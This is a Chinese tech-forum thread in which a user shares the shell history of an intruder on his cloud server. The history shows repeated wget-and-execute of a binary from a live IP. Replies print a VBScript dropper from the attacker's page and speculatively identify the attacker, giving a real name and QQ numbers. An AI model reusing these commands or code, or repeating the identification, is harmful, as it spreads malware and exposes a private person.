服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看,只图一乐
dothis 2020-01-07 09:48:18 +08:00 27489 次点击这是一个创建于 2115 天前的主题,其中的信息可能已经有所发展或是发生改变。
从 17:01 开始
为了防止上面图片挂掉、文本如下
21 2020-01-06 09:44:38 crontab -e
22 2020-01-06 09:45:16 reboot
23 2020-01-06 09:47:02 top
24 2020-01-06 17:01:03 top
25 2020-01-06 17:01:11 ls -l /proc/3557/exe
26 2020-01-06 17:01:17 netstat -atulnp
27 2020-01-06 17:01:40 ls -l /proc/1211/exe
28 2020-01-06 17:01:44 kill -9 1211
29 2020-01-06 17:01:46 crontab -l
30 2020-01-06 17:01:47 crontab -r
31 2020-01-06 17:01:48 crontab -l
32 2020-01-06 17:01:50 cd /usr/bin/
33 2020-01-06 17:01:57 rm -rf ftucwfvnpb
34 2020-01-06 17:02:00 netstat -atulnp
35 2020-01-06 17:02:03 w
36 2020-01-06 17:02:05 cd /root/
37 2020-01-06 17:02:07 cd /bin/
38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java
39 2020-01-06 17:02:19 rm -rf java.1
40 2020-01-06 17:02:20 cd /root/
41 2020-01-06 17:02:21 cd /opt/
42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java
43 2020-01-06 17:02:35 chmod 777 java
44 2020-01-06 17:02:36 ./java
45 2020-01-06 17:02:38 cd /root/
46 2020-01-06 17:02:41 ps -xua
47 2020-01-06 17:03:28 netstat -atulnp
48 2020-01-06 17:03:47 kill -9 4689
49 2020-01-06 17:03:51 netstat -atulnp
50 2020-01-06 17:04:02 cd /etc/
51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163
52 2020-01-06 17:04:15 rm -rf java
53 2020-01-06 17:04:16 cd /root/
54 2020-01-06 17:04:17 cd /bin/
55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java
56 2020-01-06 17:04:28 rm -rf java.1
57 2020-01-06 17:04:30 cd /root/
58 2020-01-06 17:04:31 cd /opt/
59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java
60 2020-01-06 17:04:36 chmod 777 java
61 2020-01-06 17:04:39 ./java
62 2020-01-06 17:04:42 cd /root/
63 2020-01-06 17:04:44 netstat -atulnp
64 2020-01-06 17:04:51 ifconfig
65 2020-01-06 17:04:54 history
66 2020-01-06 17:05:01 netstat -atulnp
67 2020-01-06 17:05:42 cd /ro
68 2020-01-06 17:05:43 cd /root/
69 2020-01-06 17:05:46 history
70 2020-01-06 17:05:53 ifconfig
71 2020-01-06 17:05:54 history
72 2020-01-06 17:05:58 w
73 2020-01-06 17:06:00 history
74 2020-01-06 17:06:24 ifconfig
75 2020-01-06 17:06:27 history
76 2020-01-06 17:06:29 history
77 2020-01-06 17:06:29 history
第 1 条附言 2020-01-07 10:55:53 +08:00
附上这两天我自己服务器的资源截图、应该还是盗走了点东西、不过还好、没啥重要的
66 条回复 2020-01-11 14:16:59 +08:00
 | 1 defunct9 2020-01-07 09:52:44 +08:00 有意思 |
 | 2 dothis OP 里面还有这个人对应的 云服务器地址 手动狗头 |
 | 3 ihciah 2020-01-07 09:54:26 +08:00 via iPhone 这是啥机器,挖出来的币有人工的时间值钱吗 |
 | 4 mangoDB 2020-01-07 09:56:07 +08:00 感觉对方功夫不到家 |
 | 5 avalon0624 2020-01-07 10:01:13 +08:00 居然用的还是国内的 ip 做,忘了服务器要实名的么? |
 | 6 dapang1221 2020-01-07 10:01:41 +08:00 这这这…纯手动的吗,真就服务器一日游啊,翻遍了。。。 |
 | 7 yEhwG10ZJa83067x 2020-01-07 10:03:31 +08:00 http://101.201.76.232:8082 可以打开 |
 | 8 itechify PRO 有趣有趣 |
 | 9 moonheart 2020-01-07 10:10:23 +08:00  1 |
| 10 dothis OP @ihciah 我是腾讯云 2 核 8G5M 的机器 @mangoDB 哈哈、是的、我已经够菜了、他比我还菜 @avalon0624 是的、不过这不是最骚的、最骚的是还能访问、笑死了 @dapang1221 我也感觉、纯手动、第一次挖矿搞的还挺像样子的、这一次直接手动、并且最后好像是放弃了?因为这次好像没有成功植入病毒、只是腾讯云那边给了个提醒 |
 | 12 afirefish 2020-01-07 10:22:32 +08:00 北京 阿里云? |
 | 13 ReZer0 2020-01-07 10:23:44 +08:00 话说我好奇的点在于是怎么被黑进去的…… |
 | 14 rongyiran 2020-01-07 10:27:31 +08:00 用的是肉鸡控制你的啊. |
 | 15 gearfox 2020-01-07 10:28:13 +08:00 还是个爱打 cs 的朋友 |
| 16 dothis OP |
 | 17 mango88 2020-01-07 10:54:43 +08:00 惊了,CS |
 | 18 LengthMin 2020-01-07 10:56:02 +08:00 BT 是宝塔吗? |
| 19 afirefish 2020-01-07 10:58:56 +08:00 @dothis BT 是宝塔吗?我一台腾讯云的服务器上面也跑了 BT,目前暂时还没有被黑过(或者是我菜,不知道被黑了)。不过我一般在腾讯云的安全组里面吧宝塔管理面板和 SSH 的端口都关了的,要用的时候再打开。 |
| 21 dothis OP |
 | 22 different 2020-01-07 11:10:10 +08:00 你也挺有意思,你的重点在于别人有多菜,而不是你的服务器怎么被别人黑进来了? |
| 23 LengthMin 2020-01-07 11:14:48 +08:00 还有一个:之前看过一篇文章,因为宝塔里开启的 phpmyadmin 的 888 端口也是暴露在公网的,所以就怎么怎么怎么就进去 shell 了 |
| 24 dothis OP |
 | 25 opengps 2020-01-07 11:25:10 +08:00 公网环境就是这么恶劣,学学防御吧,最基本的:换端口,强密码,严格的防火墙 |
 | 26 ZRS 2020-01-07 11:40:03 +08:00 via iPhone 怎么摸进来的 |
 | 27 dorothyREN 2020-01-07 11:49:27 +08:00 我 sqlserver 1 号一大早被删库了。。。 |
 | 28 shawshi 2020-01-07 12:02:51 +08:00 估计那个服务器还是肉鸡 |
| 29 shawshi 2020-01-07 12:03:03 +08:00 估计那个服务器也是肉鸡 |
 | 30 AmosAlbert 2020-01-07 12:13:40 +08:00 看这操作,你的服务器成靶场了 :) |
 | 31 guanhui07 2020-01-07 12:26:21 +08:00 阿里云.. |
 | 32 darknoll 2020-01-07 12:48:13 +08:00 1 不是通过密码登录进来的? |
 | 33 no1xsyzy 2020-01-07 12:49:16 +08:00 http://101.201.76.232:8082 的 “HFS” 页面里面是没有显示 /java 的 但 :80 带 Trojan-Dropper.VBS.Agent (卡巴斯基) 或者叫 TrojanDropper/Ramnit.f (火绒) 让我有点疑惑 直接报给 CNCERT 吧。 |
 | 34 hiya5 2020-01-07 12:53:22 +08:00 他通过密码登录进来的吗 |
 | 35 atonku 2020-01-07 13:21:23 +08:00 你黑不了他的服务器,所以你比他菜。 |
 | 36 lostpg 2020-01-07 13:21:59 +08:00 via Android 感觉这是直接密码登 root 用户进来了,如果再是弱密码,不就是开着大门睡觉了。。。 |
| 37 dothis OP |
 | 38 Mogugugugu 2020-01-07 13:52:03 +08:00 http://101.201.76.232 是个 nginx 页面,用的是 tomcat 的 fav.ico , 然后右键看一下源码、有意思、 |
 | 39 puzzle9 2020-01-07 14:17:48 +08:00 @Mogugugugu 确实有意思 不过这种病毒对现代浏览器应该失效了把 |
 | 41 songco 2020-01-07 15:16:55 +08:00 Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET NSE: Loaded 40 scripts for scanning. Initiating Ping Scan at 09:14 Scanning 101.201.76.232 [4 ports] Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts) Initiating SYN Stealth Scan at 09:14 Scanning 101.201.76.232 [100 ports] Discovered open port 1025/tcp on 101.201.76.232 Discovered open port 139/tcp on 101.201.76.232 Discovered open port 135/tcp on 101.201.76.232 Discovered open port 80/tcp on 101.201.76.232 Discovered open port 3389/tcp on 101.201.76.232 Discovered open port 1027/tcp on 101.201.76.232 Discovered open port 1026/tcp on 101.201.76.232 Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports) Initiating Service scan at 09:14 Scanning 7 services on 101.201.76.232 Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host) NSE: Script scanning 101.201.76.232. Initiating NSE at 09:15 Completed NSE at 09:15, 2.96s elapsed Initiating NSE at 09:15 Completed NSE at 09:15, 0.00s elapsed Nmap scan report for 101.201.76.232 Host is up (0.21s latency). Not shown: 77 closed ports PORT STATE SERVICE VERSION 80/tcp open http nginx 1.9.12 81/tcp filtered hosts2-ns 111/tcp filtered rpcbind 119/tcp filtered nntp 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 427/tcp filtered svrloc 445/tcp filtered microsoft-ds 515/tcp filtered printer 646/tcp filtered ldp 1025/tcp open msrpc Microsoft Windows RPC 1026/tcp open msrpc Microsoft Windows RPC 1027/tcp open msrpc Microsoft Windows RPC 1029/tcp filtered ms-lsa 3389/tcp open ms-wbt-server Microsoft Terminal Service 4899/tcp filtered radmin 5000/tcp filtered upnp 5101/tcp filtered admdog 5357/tcp filtered wsdapi 5800/tcp filtered vnc-http 5900/tcp filtered vnc 6001/tcp filtered X11:1 49152/tcp filtered unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB) |
 | 42 randomtree451 2020-01-07 15:30:07 +08:00 <SCRIPT Language=Vbscript><!-- DropFileName = "svchost.exe" WriteData = "" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> |
 | 43 tengyoubiao 2020-01-07 15:50:25 +08:00 这是挂了个感染 HTML 的木马? |
 | 44 Achiii 2020-01-07 16:43:09 +08:00 试过被利用 tp 漏洞挂马,后来过滤 post 参数关键字解决的 |
 | 45 black11black 2020-01-07 21:23:08 +08:00 老哥,说一下你这个查看用户历史记录的命令是啥呗 |
 | 46 wqshare 2020-01-07 21:31:36 +08:00 看看这老哥的 80 端口页,用 vbs 挂了个马上去,哈哈 |
 | 47 xupefei 2020-01-07 21:44:37 +08:00 via iPhone 不要对公网开 yarn 端口 |
 | 48 rootx 2020-01-07 22:11:35 +08:00 <SCRIPT Language=Vbscript><!-- DropFileName = "svchost.exe" WriteData = "" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> |
| 49 dorothyREN 2020-01-08 00:55:30 +08:00 @dothis #37 数据库没备份,只有日志,恢复起来贼特么慢,搞了两天才恢复完数据 |
 | 50 msg7086 2020-01-08 01:46:06 +08:00 1 公司服务器装宝塔?佩服佩服。 |
 | 51 HTSdTt3WygdgQQGe 2020-01-08 02:12:03 +08:00 via Android 你马上报案,说数据库丢了价值一个亿的机密资料,让阿里去查 |
 | 52 vvqqdd 2020-01-08 04:11:58 +08:00 这个服务器有个图片,点开是哥,名字叫做 nknmn。。。顾名思义 哈哈 |
 | 53 KasuganoSoras 2020-01-08 04:56:49 +08:00 在他的服务器上看到一张图片叫 “战鹰部落 MC 服务器”,正好我也是开 MC 服务器的,好奇搜了一下,找到了他们的服务器,QQ 群是 139888565,群主 QQ 是 565621504,昵称叫 NullPointerException,结合前面执行的命令以及文件名里面都含有 Java,我觉得八九不离十,楼主有兴趣可以自己去会会他? |
| 54 KasuganoSoras 2020-01-08 05:04:08 +08:00 5 https://www.mcbbs.net/thread-675592-1-1.html 2017 年的时候曾经在我的世界中文论坛发过贴说自己的服务器被 DDoS 了 9.6Gbps 流量,然后从他的个人空间找到一个域名 www.zhanyingwl.com ,打开发现 502,是 360 云盾的界面,然后我想了下既然是用的 360 CDN,那这域名肯定有备案吧。然后又去查了一下备案号,果然。 尹伊君 个人 鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com 只能帮你到这里了(笑 |
 | 55 cydian 2020-01-08 06:12:17 +08:00 via Android @KasuganoSoras 可以打开 不是 502 |
 | 56 webshe11 2020-01-08 08:17:53 +08:00 真就用宝塔呗 |
 | 57 Pzqqt 2020-01-08 08:58:35 +08:00 @xmi 参考 38 楼 病毒是藏在页面源码里的 在页面源码下方有一段恶意 Vbscript 代码 可以看出这段代码只对 Windows 系统有影响 |
| 58 dothis OP @black11black 终端下直接敲 history 就可以看 @msg7086 我自己服务器用的、感觉贼舒服、然后公司的服务器也想用、最后没用起来就凉了、以后不敢用这些东西了、自己玩玩还行 @dorothyREN。。。这就很难受了、我这边有快照、简单很多 @KasuganoSoras 卧槽、老哥稳、多谢了 |
 | 59 qanniu 2020-01-08 08:59:19 +08:00 @KasuganoSoras 大佬 v5 |
 | 60 xiaoxiongmao 2020-01-08 09:14:18 +08:00 @KasuganoSoras 厉害了老哥 |
 | 62 1239305697 2020-01-08 15:26:08 +08:00 |
| 63 1239305697 2020-01-08 16:08:30 +08:00 https://i.loli.net/2020/01/08/4jzJxGk3Z7LheDU.png 龟龟,我打开了那个地址,然后居然真的就中了。。。 |
| 64 1239305697 2020-01-08 16:16:01 +08:00 打开了楼上那个 ip 地址而且没被安全软件报毒的建议全盘扫描一下电脑,我的中了。。 |
| 65 msg7086 2020-01-08 17:14:23 +08:00 |
 | 66 maxbon 2020-01-11 14:16:59 +08:00 这个记录笑死了,最开始跑一遍是发现没跑成功又删掉重下吗 |
Select Language